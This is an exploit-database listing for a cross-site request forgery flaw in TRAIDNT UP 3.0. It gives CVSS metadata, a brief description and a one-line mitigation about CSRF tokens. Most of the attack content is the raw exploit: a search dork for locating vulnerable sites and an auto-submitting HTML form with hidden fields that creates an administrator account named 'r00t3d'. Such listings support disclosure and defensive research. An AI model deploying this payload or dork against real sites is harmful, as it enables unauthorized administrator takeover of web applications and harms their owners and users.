TRAIDNT UP Version 3.0 - CSRF Add Admin

vendor:

TRAIDNT UP

by:

P0C T34M

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: TRAIDNT UP

Affected Version From: 3.0

Affected Version To: 3.0

Patch Exists: NO

Related CWE: N/A

CPE: a:traidnt:traidnt_up:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

TRAIDNT UP Version 3.0 – CSRF Add Admin

This exploit allows an attacker to add an admin user to the TRAIDNT UP Version 3.0 application by sending a maliciously crafted request to the vulnerable application. The malicious request contains a form with hidden fields that contain the details of the admin user to be added. When the form is submitted, the application adds the user to the system without any authentication.

Mitigation:

Implementing a CSRF token in the application can help prevent this type of attack.

Source

Exploit-DB raw data:

#Title    :  TRAIDNT UP Version 3.0  - CSRF Add Admin
#Script   :  TRAIDNT UP Version 3.0 
#Language : Php
#Download : http://www.traidnt.net
#                  http://www.traidnt.net/vb/attachment.php?attachmentid=519880&d=1285278011
#Date     : 2010/12/25
#Version  : 3.0
#Dork     : "Powered by TRAIDNT UP Version 3.0 "
#Found    : by P0C T34M >> tnt-r00t 
#Homepage : www.p0c.cc



<html>
    <form name="p0c" action="http://127.0.0.1/up/admin/users.php?do=addnew" method="post">
    <input type="hidden" name="name" value="r00t3d"/>
    <input type="hidden" name="password" value="Password"/>
    <input type="hidden" name="email" value="myemail@hotmail.com"/>
    <input type="hidden" name="birthdate" value="1987"/>
    <input type="hidden" name="country" value="SA"/>
    <input type="hidden" name="group" value="1"/>
</form>
<script>document.p0c.submit();</script>
</html>
TRAIDNT UP Version 3.0  - CSRF Add Admin